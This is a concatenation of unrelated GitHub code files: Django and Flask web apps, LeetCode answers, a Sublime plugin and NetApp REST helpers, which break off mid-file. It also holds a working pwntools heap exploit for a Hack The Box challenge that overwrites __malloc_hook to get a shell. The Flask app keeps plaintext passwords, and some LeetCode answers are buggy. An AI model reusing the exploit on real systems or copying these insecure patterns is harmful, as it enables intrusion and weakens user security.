final_texts[0][orig_len:]\n","repo_name":"markmliu/moonboard_nn","sub_path":"names/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"3379288081","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.core.paginator import Paginator\nfrom inventory.forms import OrderForm, OrderItemsFormSet\nfrom inventory.models import Order, OrderItems, OrderNotes\nfrom django.contrib.auth.decorators import login_required\nfrom django.urls import reverse\n\n\n@login_required\ndef order_list(request):\n orders = Order.objects.all()\n paginator = Paginator(orders, 5)\n\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n title = 'Orders'\n context = {'orders': orders, 'title': title, 'page_obj': page_obj}\n\n return render(request, 'inventory/order/orders.html', context)\n\n\n@login_required\ndef create_order(request):\n form = OrderForm(request.POST or None)\n\n if request.method == 'POST':\n if form.is_valid():\n instance = form.save(commit=False)\n instance.issued_by = request.user\n instance.save()\n messages.add_message(request, messages.SUCCESS, \"Order created.\")\n\n return redirect(reverse('edit_order', instance.id))\n else:\n messages.add_message(request, messages.ERROR, \"Error in saving entry.\")\n\n title = 'Create Order'\n context = {'form': form, 'title': title}\n return render(request, 'inventory/order/order_form.html', context)\n\n\ndef edit_order(request, oid=None):\n title = 'Edit Order'\n context = {}\n try:\n order = Order.objects.get(pk=oid)\n form = OrderForm(instance=order)\n formset = OrderItemsFormSet(queryset=OrderItems.objects.filter(order=order))\n\n if request.method == 'POST':\n if request.POST.get('form-TOTAL_FORMS') is None:\n form = OrderForm(request.POST or None, instance=order)\n\n if form.is_valid():\n form.save()\n messages.add_message(request, messages.SUCCESS, \"Order updated.\")\n return redirect('edit_order', order.id)\n else:\n messages.add_message(request, messages.ERROR, \"Error in saving entry.\")\n else:\n formset = OrderItemsFormSet(request.POST, request.FILES)\n if formset.is_valid():\n instances = formset.save(commit=False)\n\n for instance in instances:\n instance.order = order\n instance.save()\n\n for deleted_item in formset.deleted_objects:\n deleted_item.delete()\n\n messages.add_message(request, messages.SUCCESS, \"Order items updated.\")\n return redirect('edit_order', order.id)\n else:\n messages.add_message(request, messages.ERROR, \"Error in saving entry.\")\n\n context = {'form': form, 'formset': formset, 'order': order, 'title': title}\n except Order.DoesNotExist:\n raise Http404(\"Order does not exist\")\n return render(request, \"inventory/order/order_form.html\", context)\n\n\n","repo_name":"dax1216/inventory-py","sub_path":"inventory/views/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"26712138185","text":"class Solution(object):\n def plusOne(self, digits):\n \"\"\"\n :type digits: List[int]\n :rtype: List[int]\n \"\"\"\n return str(int(\"\".join(str(k) for k in digits)) + 1).split(\" \")[0]\n\n\nclass Zeroes:\n def moveZeroes(self, nums):\n non_zero_index = 0\n for i, num in enumerate(nums):\n if num != 0:\n nums[non_zero_index] = nums[i]\n non_zero_index += 1\n\n\n\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n start = 0\n end = len(s)\n while start < end:\n temp = s[end]\n s[end] = s[start]\n s[start] = temp\n start += 1\n end -= 1","repo_name":"konstantinosBlatsoukasRepo/leet_code","sub_path":"easy/66_plus_one.py","file_name":"66_plus_one.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"2693763031","text":"import os.path\r\nimport re\r\nimport subprocess\r\nimport os\r\nimport sublime\r\nimport sublime_plugin\r\n\r\nclass StylusCompileCommand(sublime_plugin.TextCommand):\r\n\tdef run(self, edit):\r\n\t\tStylus().compile()\r\n\r\nclass StylusCompressCommand(sublime_plugin.TextCommand):\r\n\tdef run(self, edit):\r\n\t\tStylus().compress()\r\n\r\nclass StylusWatchCommand(sublime_plugin.TextCommand):\r\n\tdef run(self, edit):\r\n\t\tStylus().watch()\r\n\r\nclass RutasStylus:\r\n\tdef rutaAtributos():\r\n\t\tpathStylus=os.path.join(sublime.packages_path(), \"stylus\", \"stylus.json\")\r\n\t\tRutasStylus.verificarRuta(pathStylus)\r\n\t\treturn pathStylus\r\n\r\n\tdef verificarRuta(ruta):\r\n\t\tif not os.path.exists(ruta):\r\n\t\t\topen(ruta, \"w\").close()\r\n\r\nclass ArchivoStylus:\r\n\tdef cargar():\r\n\t\td=sublime.decode_value(open(RutasStylus.rutaAtributos()).read())\r\n\t\tif d==None:\r\n\t\t\td={\"atributos\":{}, \"etiquetas\":[]}\r\n\t\treturn d\r\n\r\n\tdef allEtiquetas():\r\n\t\treturn ArchivoStylus.cargar()[\"etiquetas\"]\r\n\t\r\n\tdef allAtributos():\r\n\t\treturn list(ArchivoStylus.cargar()[\"atributos\"].keys())\r\n\r\n\r\n\tdef allValores(etiqueta):\r\n\t\td=ArchivoStylus.cargar()[\"atributos\"]\r\n\t\tif d.get(etiqueta):\r\n\t\t\treturn d[etiqueta]\r\n\r\n\tdef guardar(d):\r\n\t\topen(RutasStylus.rutaAtributos(), \"w\").write(sublime.encode_value(d, True))\r\n\r\n\tdef agregar(etiquetas, atributos):\r\n\t\td=ArchivoStylus.cargar()\r\n\t\td[\"etiquetas\"]=list(set(d[\"etiquetas\"]) | set(etiquetas))\r\n\t\tfor atributo in atributos:\r\n\t\t\tif not d[\"atributos\"].get(atributo):d[\"atributos\"][atributo]=[]\r\n\t\t\td[\"atributos\"][atributo]=list(set(d[\"atributos\"][atributo])|atributos[atributo])\r\n\t\tArchivoStylus.guardar(d)\r\n\r\nclass Stylus:\r\n\tdef __init__(self):\r\n\t\tself.filename=sublime.active_window().active_view().file_name()\r\n\t\tif self.filename:\r\n\t\t\tos.chdir(os.path.dirname(self.filename))\r\n\t\r\n\tdef compile(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus %s\"%os.path.basename(self.filename))\r\n\r\n\tdef compress(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus -c %s\"%os.path.basename(self.filename))\r\n\r\n\tdef watch(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus -w %s\"%os.path.basename(self.filename))\r\n\r\n\tdef comando(self, comando):\r\n\t\treturn comando if sublime.platform()==\"windows\" else \"gnome-terminal -x bash -c '%s'\"%(comando)\r\n\r\n\tdef ejecutar(self, comando, shell=True):\r\n\t\tproceso=subprocess.Popen(self.comando(comando), shell=shell, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\r\n\t\tif proceso.communicate()[1]:\r\n\t\t\terror=proceso.communicate()[1].decode(\"utf-8\")\r\n\t\t\tsublime.status_message(\"MAL \"+error)\r\n\t\t\tprint(error)\r\n\t\telse:\r\n\t\t\tsalida=proceso.communicate()[0].decode(\"utf-8\")\r\n\t\t\tsublime.status_message(\"BIEN\"+salida)\r\n\t\t\treturn salida\r\n\r\nclass StylusListener(sublime_plugin.EventListener):\r\n\tdef on_query_completions(self, view, prefix, locations):\r\n\t\tif not view.scope_name(0).startswith(\"source.stylus \"):return\r\n\t\tpunto=view.sel()[0].a\r\n\t\tlinea=view.substr(sublime.Region(view.line(punto).a, punto))\r\n\t\tif re.match(\"^[\\w]*$\", linea):\r\n\t\t\treturn [(e+\"\\t•\", e) for e in ArchivoStylus.allEtiquetas()]\r\n\t\telif re.match(\"^\\s+[\\w-]*$\", linea):\r\n\t\t\treturn [(a+\"\\t•\", a) for a in ArchivoStylus.allAtributos()]\r\n\t\telif 
class Stylus:\r\n\tdef __init__(self):\r\n\t\tself.filename=sublime.active_window().active_view().file_name()\r\n\t\tif self.filename:\r\n\t\t\tos.chdir(os.path.dirname(self.filename))\r\n\r\n\tdef compile(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus %s\"%os.path.basename(self.filename))\r\n\r\n\tdef compress(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus -c %s\"%os.path.basename(self.filename))\r\n\r\n\tdef watch(self):\r\n\t\tif self.filename:\r\n\t\t\tself.ejecutar(\"stylus -w %s\"%os.path.basename(self.filename))\r\n\r\n\tdef comando(self, comando):\r\n\t\treturn comando if sublime.platform()==\"windows\" else \"gnome-terminal -x bash -c '%s'\"%(comando)\r\n\r\n\tdef ejecutar(self, comando, shell=True):\r\n\t\tproceso=subprocess.Popen(self.comando(comando), shell=shell, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\r\n\t\tsalida, error=proceso.communicate()  # communicate() may only be called once per process\r\n\t\tif error:\r\n\t\t\terror=error.decode(\"utf-8\")\r\n\t\t\tsublime.status_message(\"MAL \"+error)\r\n\t\t\tprint(error)\r\n\t\telse:\r\n\t\t\tsalida=salida.decode(\"utf-8\")\r\n\t\t\tsublime.status_message(\"BIEN\"+salida)\r\n\t\t\treturn salida\r\n\r\nclass StylusListener(sublime_plugin.EventListener):\r\n\tdef on_query_completions(self, view, prefix, locations):\r\n\t\tif not view.scope_name(0).startswith(\"source.stylus \"):return\r\n\t\tpunto=view.sel()[0].a\r\n\t\tlinea=view.substr(sublime.Region(view.line(punto).a, punto))\r\n\t\tif re.match(r\"^[\\w]*$\", linea):\r\n\t\t\treturn [(e+\"\\t•\", e) for e in ArchivoStylus.allEtiquetas()]\r\n\t\telif re.match(r\"^\\s+[\\w-]*$\", linea):\r\n\t\t\treturn [(a+\"\\t•\", a) for a in ArchivoStylus.allAtributos()]\r\n\t\telif re.match(r\"^\\s+[\\w-]+\\s+[\\w-]*$\", linea):\r\n\t\t\tatributo=re.findall(r\"^\\s+([\\w-]+)\\s+[\\w-]*$\", linea)[0]\r\n\t\t\tvalores=ArchivoStylus.allValores(atributo)\r\n\t\t\tif valores:  # allValores returns None for unknown attributes\r\n\t\t\t\treturn [(v+\"\\t•\", v) for v in valores]\r\n\r\n\tdef on_pre_save(self, view):\r\n\t\tif not view.scope_name(0).startswith(\"source.stylus \"):return\r\n\t\ttexto=view.substr(sublime.Region(0, view.size()))\r\n\t\tetiquetas=re.findall(r\"\\n([\\w]+)\\n\", texto)\r\n\t\tatributos=re.findall(r\"\\s+([\\w-]+) ([\\w -]+)\", texto)\r\n\t\tvariables=re.findall(r\"([\\w$]+)\\s*=.\", texto)\r\n\t\ta={}\r\n\t\tfor atributo in atributos:\r\n\t\t\tvalor=atributo[1]\r\n\t\t\tif valor in variables:continue\r\n\t\t\tatributo=atributo[0]\r\n\t\t\tif not a.get(atributo):a[atributo]=set()\r\n\t\t\ta[atributo].add(valor)\r\n\t\tArchivoStylus.agregar(etiquetas, a)\r\n\t\tview.run_command(\"stylus_compile\")","repo_name":"programadorsito/Packages","sub_path":"Packages/stylus/stylus.py","file_name":"stylus.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"}
+{"seq_id":"9175726955","text":"#import libraries\nimport os\nfrom enum import unique\nfrom flask import Flask, render_template, request, url_for, redirect, session, g\nfrom flask_sqlalchemy import SQLAlchemy\nfrom matplotlib import pyplot as plt\n\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\ninstances_folder = os.path.join(basedir, 'instances')\nif not os.path.exists(instances_folder):\n os.makedirs(instances_folder)\n\n#create a Flask Instance\napp=Flask(__name__)\napp.secret_key = 'any random string '\n# Add Database\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(instances_folder, 'database.sqlite3')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n#Initialize the database\ndb=SQLAlchemy(app)\n\n#create model\nclass User(db.Model):\n email_address = db.Column(db.String(100), primary_key=True, nullable=False, unique=True)\n name = db.Column(db.String(100), nullable=False)\n password = db.Column(db.String(100), nullable=False)\n\n def __init__(self, email_address, name, password):\n self.email_address = email_address\n self.name = name\n self.password = password\n\nclass Tracker(db.Model):\n Tracker_ID = db.Column(db.Integer, primary_key=True, autoincrement=True)\n Name = db.Column(db.String(100), nullable=False)\n Desc = db.Column(db.String(100), nullable=False)\n Tracker_Type = db.Column(db.String(100), nullable=False)\n Settings = db.Column(db.String(100))\n username = db.Column(db.String(100), db.ForeignKey('user.email_address'), nullable=False)\n\n def __init__(self, Name, Desc, Tracker_Type, Settings, username):\n self.Name = Name\n self.Desc = Desc\n self.Tracker_Type = Tracker_Type\n self.Settings = Settings\n self.username = username\n\nclass Log(db.Model):\n Timestamp = db.Column(db.String(100), nullable=False)\n log_ID = db.Column(db.Integer, primary_key=True, autoincrement=True)\n l_student = db.Column(db.String(100), db.ForeignKey('user.email_address'), nullable=False)\n l_Tracker_ID = db.Column(db.Integer, db.ForeignKey('tracker.Tracker_ID'), nullable=False)\n value = db.Column(db.String(100), nullable=False)\n notes = db.Column(db.String(100), nullable=False)\n\n def __init__(self, Timestamp, l_student, l_Tracker_ID, value, notes):\n self.Timestamp = Timestamp\n self.l_student = l_student\n self.l_Tracker_ID = l_Tracker_ID\n self.value = value\n self.notes = notes\n\n\n\n\n\n@app.before_request\n@app.before_request\ndef before_request():\n users = User.query.all()\n if 'user_id' in session:\n user = [x for x in users if x.email_address == session['user_id']]\n if user:\n g.user = user[0]\n else:\n g.user = None\n else:\n g.user = None\n\n\n@app.route('/')\ndef home():\n if g.user == None:\n return redirect(url_for('login'))\n else:\n return redirect(url_for('profile'))\n\n@app.route(\"/register\",methods=['GET','POST'])\ndef register():\n if request.form:\n e = request.form['email']\n n = request.form['name']\n p = request.form['pass']\n\n \n missing=User.query.filter_by(email_address=e).first()\n if missing is None:\n s=User(email_address=e, name=n, password=p)\n db.session.add(s)\n db.session.commit()\n return render_template('registration_successful.html')\n else:\n return render_template('user_already_exists.html')\n\n \n\n\n return render_template('user_registration.html')\n\n\n\n@app.route(\"/login\",methods=['GET','POST'])\ndef login():\n if request.method=='POST':\n\n session.pop('user_id', None)\n\n un = request.form['username']\n pw = request.form['password']\n\n userdata = User.query.all()\n for i in userdata:\n if 
\n@app.route('/logout')\ndef logout():\n    session.pop('user_id', None)\n    return render_template('logout.html')\n\n@app.route('/profile')\ndef profile():\n    if g.user == None:\n        return redirect(url_for('login'))\n    else:\n        trackers = Tracker.query.filter_by(username = g.user.email_address)\n\n        if trackers:\n            return render_template('profile.html', trackers=trackers)\n        else:\n            return render_template('fresh_profile.html')\n\n\n@app.route('/tracker/create',methods=['GET', 'POST'])\ndef tracker_create():\n    if g.user == None:\n        return redirect(url_for('login'))\n    else:\n        if request.method =='POST':\n            name=request.form['name']\n            desc=request.form['desc']\n            tracker_type=request.form['tracker_type']\n            settings = request.form['setting']\n\n            missing=Tracker.query.filter_by(Name = name , username = g.user.email_address).first()\n            if missing is None:\n                # If tracker not exists\n                s=Tracker(Name = name,Desc=desc,Tracker_Type=tracker_type,Settings=settings,username = g.user.email_address)\n                db.session.add(s)\n                db.session.commit()\n                return redirect(url_for('profile'))\n            return render_template('tracker_exists.html')\n\n        return render_template('add_tracker.html')\n\n\n\n@app.route('/tracker/<int:Tracker_ID>')  # URL converter reconstructed; it was missing from this copy\ndef tracker_page(Tracker_ID):\n    if g.user == None:\n        return redirect(url_for('login'))\n    else:\n        logs = Log.query.with_entities(Log.Timestamp,Log.value).filter_by(l_student = g.user.email_address, l_Tracker_ID = Tracker_ID)\n        x=[]\n        y=[]\n        for i in logs:\n            print(i)\n            x.append(i[0])\n            y.append(i[1])\n        plt.clf()  # start from a clean figure so lines do not pile up across requests\n        plt.plot(x,y)\n        plt.xlabel(\"Timestamp\")\n        plt.ylabel(\"Value\")\n        plt.savefig('static/img.png',dpi=300)\n        tracker = Tracker.query.filter_by(Tracker_ID=Tracker_ID).first()\n        logss = Log.query.filter_by(l_student = g.user.email_address, l_Tracker_ID = Tracker_ID)\n\n        return render_template('tracker_page.html',logss = logss, tracker = tracker)\n
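# Added note (assumption, not original code): when rendering charts inside request\n# handlers like tracker_page above, matplotlib's non-interactive backend avoids\n# GUI/threading issues; it must be selected before pyplot is imported:\n# import matplotlib\n# matplotlib.use('Agg')\n# from matplotlib import pyplot as plt\n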
\n@app.route('/tracker/<int:Tracker_ID>/update',methods=['GET','POST'])\ndef update_tracker(Tracker_ID):\n    if g.user == None:\n        return redirect(url_for('login'))\n    else:\n        if request.method == 'POST':\n            name=request.form['name']\n            desc=request.form['desc']\n            tracker_type=request.form['tracker_type']\n            settings = request.form['setting']\n            s=Tracker.query.filter_by(Tracker_ID=Tracker_ID).update(dict(Name=name,Desc=desc,Tracker_Type=tracker_type,Settings=settings))\n            db.session.commit()\n            return redirect(url_for('profile'))\n        elif request.method == 'GET':\n            this_tracker = Tracker.query.filter_by(Tracker_ID=Tracker_ID).first()\n            options = Tracker.query.with_entities(Tracker.Tracker_Type).filter_by(Tracker_ID=Tracker_ID).all()\n            l=[]\n            for i in options:\n                if i == ('numerical',):\n                    l.append(1)\n                else:\n                    l.append(2)\n            print(l)\n            return render_template('update_tracker.html',this_tracker = this_tracker,l = l)\n\n\n@app.route('/tracker/<int:Tracker_ID>/delete')\ndef delete_tracker(Tracker_ID):\n    if g.user == None:\n        return redirect(url_for('login'))\n    else:\n        Tracker.query.filter_by(Tracker_ID=Tracker_ID).delete()\n        Log.query.filter_by(l_Tracker_ID=Tracker_ID).delete()\n        db.session.commit()\n        return redirect(url_for('profile'))\n\n\n\n@app.route('/add_log/<int:Tracker_ID>',methods=['GET', 'POST'])\ndef add_log(Tracker_ID):\n    tracker = Tracker.query.filter_by(Tracker_ID = Tracker_ID)\n    if request.method == 'POST':\n        date = request.form['date']\n        value = request.form['value']\n        notes = request.form['notes']\n\n        s=Log(Timestamp = date,l_student = g.user.email_address,l_Tracker_ID = Tracker_ID,value = value , notes = notes)\n        db.session.add(s)\n        db.session.commit()\n        return redirect(url_for('profile'))\n\n    elif tracker[0].Tracker_Type=='numerical':\n        return render_template('add_log1.html',tracker = tracker)\n    else:\n        values = tracker[0].Settings\n        values_list = values.split(\",\")\n        return render_template('add_log2.html',tracker=tracker,values_list = values_list)\n\n\nif __name__ == \"__main__\":\n    database_path = os.path.join(instances_folder, 'database.sqlite3')\n    if not os.path.isfile(database_path):\n        with app.app_context():\n            db.create_all()\n    app.run()","repo_name":"ravikumawat7716/QuantifiedSelfApp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"27103310043","text":"# 큰 수의 법칙\n\n# n개의 숫자를 입력받고 m번을 더하여 가장 큰 수를 만드는 법칙\n# 특정한 인덱스가 연속하여 k개를 초과하지 않아야 한다. (k <= m)\n\nn, m, k = map(int, input().split())\ndata = list(map(int, input().split()))\n\ndata.sort() # 원본이 정렬됨.\nfirst = data[n-1] # 가장 큰수\nsecond = data[n-2] # 두번째 큰수\n\nresult = 0\n\nwhile True: # first, second 반복\n for i in range(k): # first 를 합산\n if m == 0:\n break\n result += first\n m -= 1\n if m == 0: # second 를 합산\n break\n result += second\n m -= 1\n\nprint(result)\n\n","repo_name":"sa46lll/algorithm-interview","sub_path":"algorithm/ch03/3.2.py","file_name":"3.2.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"31862527983","text":"class user:\n def __init__(self,name,mobile_no,address=\"\"):\n self.name=name\n self.mobile=mobile_no\n self.address=address\n\n\nclass BankAccount:\n def __init__(self,user_details):\n self.account_holder=user_details\n self.generate_account_no()\n self.balance=0\n \n def generate_account_no(self):\n import uuid\n self.account_no=str(uuid.uuid4())\n \n \n def deposit(self,amount):\n self.balance+=amount\n \n def withdraw(self,amount):\n if amount>self.balance:\n print(\"Insufficient amount\")\n else:\n self.balance-=amount\n \nu=user(\"anu\",\"99999999\",address=\"kurnool\")\nprint(u.name,u.mobile,u.address)\nb=BankAccount(u)\nprint(b.account_holder.name,b.account_holder.mobile,b.account_no,b.balance)\nb.deposit(100)\nprint(b.balance)\nb.deposit(1000)\nprint(b.balance)\nb.withdraw(500)\nprint(b.balance)","repo_name":"thosamanitha/python","sub_path":"python/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"20033610596","text":"from pwn import *\n\n# Overwrite main arena top chunk pointer\n\np=None\nif args.LOCAL:\n p = process('./childish_calloc', env={\"LD_PRELOAD\" : \"./libc.so.6\"})\nelse:\n p = remote('docker.hackthebox.eu', 32407)\n\ncontext.terminal = ['gnome-terminal', '-e']\nif args.GDB:\n gdb.attach(p)\n\nprm = 'Choice:'\ndef rprm():\n p.recvuntil(prm)\n\ndef rcol():\n p.recvuntil(':')\n\ndef alloc(idx, sz, data):\n rprm()\n p.sendline('1')\n rcol()\n p.sendline(str(idx))\n rcol()\n p.sendline(str(sz))\n rcol()\n p.send(data)\n\n\ndef free(idx, shell = False):\n rprm()\n p.sendline('2')\n rcol()\n p.sendline(str(idx))\n if shell:\n p.interactive()\n rcol()\n p.sendline('100')\n\ndef realloc(idx, sz,data):\n rprm()\n p.sendline('2')\n rcol()\n p.sendline(str(idx))\n rcol()\n p.sendline(str(sz))\n p.interactive()\n\n\n\ndef show(idx):\n rprm()\n p.sendline('3')\n rcol()\n p.sendline(str(idx))\n data = p.recvline().strip()\n return data\n\ndef big_alloc(sz):\n rprm()\n p.sendline('4')\n rcol()\n p.sendline(str(sz))\n\nalloc(0, 0x20, \"A\"*4)\nalloc(1, 0x20, \"B\"*4)\nalloc(2, 0x20, \"C\"*4)\nalloc(3, 0x20, \"A\"*4)\n\nfree(0)\nfree(1)\n\nbig_alloc(0x600)\n\nlibc = ELF('./libc.so.6')\noffset = 0x3ebcf0\n\nleak = u64(show(0).ljust(8, b'\\x00'))\nlog.success(hex(leak))\n\nlibc.address = leak - offset\nlog.success(hex(libc.address))\n\nfree(2)\nfree(3)\nfree(2)\n\nmalloc_hook =libc.symbols[\"__malloc_hook\"]\nfree_hook =libc.symbols[\"__free_hook\"]\ntop_chunk_ptr = leak - 0x70\n\nlog.info('malloc hook {}'.format(hex(malloc_hook)))\nlog.info(hex(free_hook))\nlog.info(hex(top_chunk_ptr))\n\n# fake chunk of\nfk_chunk = top_chunk_ptr-0x30\nlog.info(hex(fk_chunk))\n\nalloc(4, 0x20, p64(0x41)) # 2\nalloc(5, 0x20, \"X\"*4) # 3\nalloc(6, 0x20, \"Y\"*4) # 2\n\nalloc(7, 0x38, \"Z\"*4)\nalloc(8, 0x38, \"K\"*4)\nfree(7)\nfree(8)\nfree(7)\n\nalloc(9, 0x38, p64(fk_chunk))\nalloc(10, 0x38, \"A\")\nalloc(11, 0x38, \"B\")\n\nalloc(12, 0x38, p64(fk_chunk+0x10) + p64(0x41))\nalloc(13, 0x38, b\"A\"*0x30 + p64(malloc_hook-0x15))\nlog.info(\"try one gadget\")\ngadgets = [0x4f2c5, 0x4f322, 0x10a38c]\ng=libc.address + gadgets[1]\nalloc(14, 0x38, b\"A\"*5 + p64(g))\n\nrealloc(0, 0x28, \"A\"*10)\n\np.interactive()\n","repo_name":"JustBeYou/ctfs","sub_path":"htb20/pwn_childish_calloc/expl.py","file_name":"expl.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"91"}
+{"seq_id":"73674151664","text":"\"\"\"\r\nThis module is used by the other example modules in this directory. It is not\r\nmeant as a stand-alone application.\r\nCopyright (c) 2020 NetApp, Inc. All Rights Reserved.\r\nLicensed under the BSD 3-Clause \"New\" or \"Revised\" License (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\nhttps://opensource.org/licenses/BSD-3-Clause\r\n\"\"\"\r\n\r\nimport sys\r\nimport time\r\nimport base64\r\nimport argparse\r\nfrom getpass import getpass\r\nimport logging\r\nimport subprocess\r\nfrom typing import List, Union\r\nimport requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\n\r\nSUBSTEP_INDEX = 1\r\nSTEP_INDEX = 1\r\n\r\n\r\nclass Argument: # pylint: disable=too-few-public-methods\r\n \"\"\"A structure to hold details of an argument\"\"\"\r\n\r\n def __init__(\r\n self,\r\n short_arg: str,\r\n long_arg: str,\r\n help_string: str,\r\n default=None,\r\n required=False):\r\n self.short_arg = short_arg\r\n self.long_arg = long_arg\r\n self.help_string = help_string\r\n self.default = default\r\n self.required = required\r\n\r\n\r\ndef parse_args(\r\n program_description: str,\r\n arguments: List[Argument]) -> argparse.Namespace:\r\n \"\"\"Parse the command line arguments from the user\"\"\"\r\n\r\n parser = argparse.ArgumentParser(description=program_description)\r\n for argument in arguments:\r\n parser.add_argument(\r\n argument.short_arg, argument.long_arg, required=argument.required,\r\n help=argument.help_string, default=argument.default,\r\n )\r\n parser.add_argument(\r\n \"-u\",\r\n \"--api_user\",\r\n default=\"admin\",\r\n help=\"API Username\")\r\n parser.add_argument(\"-p\", \"--api_pass\", help=\"API Password\")\r\n parsed_args = parser.parse_args()\r\n\r\n # collect the password without echo if not already provided\r\n if not parsed_args.api_pass:\r\n parsed_args.api_pass = getpass()\r\n\r\n return parsed_args\r\n\r\n\r\ndef setup_logging() -> None:\r\n \"\"\"Configure logging for the application\"\"\"\r\n\r\n logging.basicConfig(\r\n level=logging.INFO,\r\n format=\"[%(asctime)s] [%(levelname)5s] [%(module)s:%(lineno)s] %(message)s\",\r\n )\r\n\r\n\r\ndef setup_connection(api_user: str, api_pass: str):\r\n \"\"\"Configure the default connection for the application\"\"\"\r\n\r\n base64string = base64.encodebytes(\r\n ('%s:%s' %\r\n (api_user, api_pass)).encode()).decode().replace('\\n', '')\r\n\r\n headers = {\r\n 'authorization': \"Basic %s\" % base64string,\r\n 'content-type': \"application/json\",\r\n 'accept': \"application/json\"\r\n }\r\n return headers\r\n\r\n\r\ndef get_size(vol_size: int):\r\n \"\"\" Convert MB to Bytes\"\"\"\r\n tmp = int(vol_size) * 1024 * 1024\r\n return tmp\r\n\r\n\r\ndef step(text: str) -> None:\r\n \"\"\"Print a header for this step of the script\r\n\r\n Args:\r\n text: The message that describes what this step is doing\r\n \"\"\"\r\n\r\n global SUBSTEP_INDEX, STEP_INDEX # pylint: disable=global-statement\r\n SUBSTEP_INDEX = 1\r\n\r\n logging.info(\"#\" * 80)\r\n logging.info(\"# Step %s: %s\", STEP_INDEX, text)\r\n logging.info(\"#\" * 80)\r\n STEP_INDEX += 1\r\n\r\n\r\ndef substep(text: str) -> None:\r\n \"\"\"Print a header for this substep\r\n\r\n Args:\r\n text: The message that describes what this substep is doing\r\n \"\"\"\r\n\r\n global SUBSTEP_INDEX # pylint: disable=global-statement\r\n logging.info(\"%s) %s\", SUBSTEP_INDEX, text)\r\n SUBSTEP_INDEX += 1\r\n\r\n\r\ndef run_cmd(command: Union[List[str], 
str]) -> None:\r\n    \"\"\"Run the given command from the system.\r\n\r\n    If the command is provided as a string, a shell will be invoked to parse and\r\n    run the command. If it is provided as a list of strings, the command will be\r\n    executed directly. See the subprocess module documentation around the use of\r\n    the shell argument.\r\n\r\n    Args:\r\n        command: A string or a list of strings which represent the command to be\r\n            run on the system shell.\r\n\r\n    Raises:\r\n        subprocess.CalledProcessError: This will be raised if the return code\r\n            was not 0.\r\n    \"\"\"\r\n\r\n    if isinstance(command, list):\r\n        run_in_shell = False\r\n        logging.info(\">>> %s\", \" \".join(command))\r\n    else:\r\n        run_in_shell = True\r\n        logging.info(\">>> %s\", command)\r\n    result = subprocess.run(\r\n        command,\r\n        shell=run_in_shell,\r\n        stdout=subprocess.PIPE,\r\n        stderr=subprocess.PIPE,\r\n        check=False,  # checked manually below so stderr can be logged before raising\r\n    )\r\n    if result.returncode != 0:\r\n        logging.info(\"<<<: %s\", result.stderr.decode(\"utf-8\"))\r\n        result.check_returncode()\r\n    else:\r\n        logging.info(\"<<< %s\", result.stdout.decode(\"utf-8\"))\r\n\r\n\r\ndef show_quotarule(cluster: str, headers_inc: str) -> None:\r\n    \"\"\"Lists quota rules\"\"\"\r\n    print()\r\n    print(\"Getting Quota Rule Details\")\r\n    print(\"==========================\")\r\n    # https://10.195.51.149:443/api/storage/quota/rules\r\n    qr_api_url = \"https://{}/api/storage/quota/rules\".format(\r\n        cluster)\r\n    try:\r\n        response = requests.get(qr_api_url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    qrdict = dict(response.json())\r\n    quotas = qrdict['records']\r\n    print(\" List of Quota Rules :- \")\r\n    for quota in quotas:\r\n        print(\"=====\")\r\n        print(\"Quota Volume Name = %s\" % quota['volume']['name'])\r\n        print(\"Quota UUID = %s\" % quota['uuid'])\r\n\r\n\r\ndef show_interface(cluster: str, headers_inc: str):\r\n    \"\"\" List Interface\"\"\"\r\n    print(\"\\n List of Interface:- \\n\")\r\n    int_api_url = \"https://{}/api/network/ip/interfaces\".format(\r\n        cluster)\r\n    try:\r\n        response = requests.get(int_api_url, headers=headers_inc, verify=False)\r\n    except requests.exceptions.HTTPError as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    except requests.exceptions.RequestException as err:\r\n        print(str(err))\r\n        sys.exit(1)\r\n    url_text = response.json()\r\n    if 'error' in url_text:\r\n        print(url_text)\r\n        sys.exit(1)\r\n\r\n    intdict = dict(response.json())\r\n    inters = intdict['records']\r\n    print()\r\n    print(\" List of 